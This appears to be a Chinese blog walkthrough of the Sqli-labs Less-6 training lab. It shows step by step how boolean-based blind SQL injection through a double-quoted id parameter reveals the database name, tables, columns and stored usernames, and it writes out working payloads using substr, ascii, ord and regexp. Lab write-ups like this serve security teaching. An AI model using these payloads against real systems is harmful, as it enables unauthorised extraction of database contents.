Sqli-labs靶场 Less6

Less6 布尔盲注

流程:
1.判断注入类型
2.判断数据库版本	left(version(),1)>=5
3.判断数据库名字的长度	length(database())=8
4.判断数据库的名字	left(database(),8)='security'
5.判断表名的长度	length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) = 6
6.判断表名	ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 100
7.判断列名	1=(select 1 from information_schema.columns where table_name = 'users' and column_name regexp '^u[a-z]' limit 0,1)
8.爆字段	ascii(substr((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68
		或者	ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68
  1. 判断注入类型
    在这里插入图片描述在这里插入图片描述双引号注入

  2. 判断字段数
    在这里插入图片描述在这里插入图片描述
    字段数为3

  3. 判断数据库版本

?id=1" and left(version(),1)>=5 --+

在这里插入图片描述版本MYSQL>5

  1. 判断数据库名字的长度

在这里插入图片描述
4. 判断数据库的名字
在这里插入图片描述在这里插入图片描述在这里插入图片描述爆破出数据库的名字为 security
5. 判断库中每个表名的长度

?id=1" and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) = 6--+

在这里插入图片描述第一个表名长度为6
在这里插入图片描述第二个表名长度为8
在这里插入图片描述第三个表名长度为7
在这里插入图片描述第四个表名长度为5
在这里插入图片描述没有第五个表

  1. 爆破表名
?id=1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) > 100 --+

在这里插入图片描述在这里插入图片描述查询ASCII码对照表,101对应小写的e,即第一个表的第一个字符为 e

在这里插入图片描述第一个表的第二个字符为 m
在这里插入图片描述第一个表的第三个字符为 a
。。。
上帝视角,我们直接测试第四个表
在这里插入图片描述第四个表的第一个字符为u
在这里插入图片描述第四个表的第二个字符为s
在这里插入图片描述第四个表的第三个字符为e
在这里插入图片描述第四个表的第四个字符为r
在这里插入图片描述第四个表的第五个字符为s
即第四个表名为users

  1. 爆破列
1" and 1=(select 1 from information_schema.columns where table_name = 'users' and column_name regexp '^u[a-z]' limit 0,1) --+

在这里插入图片描述利用正则匹配判断列名,
在这里插入图片描述测试出表中存在username列
在这里插入图片描述测试出表中存在password列

在这里插入图片描述测试出表中存在id列

  1. 爆字段
1" and ascii(substr((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68 --+

在这里插入图片描述表中第一行的第一个字符为D
在这里插入图片描述表中第一行的第二个字符为u

也可以使用ord()、mid()函数

1" and ord(mid((select ifnull(cast(username as char),0x20) from security.users order by id limit 0,1),1,1))=68 --+

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值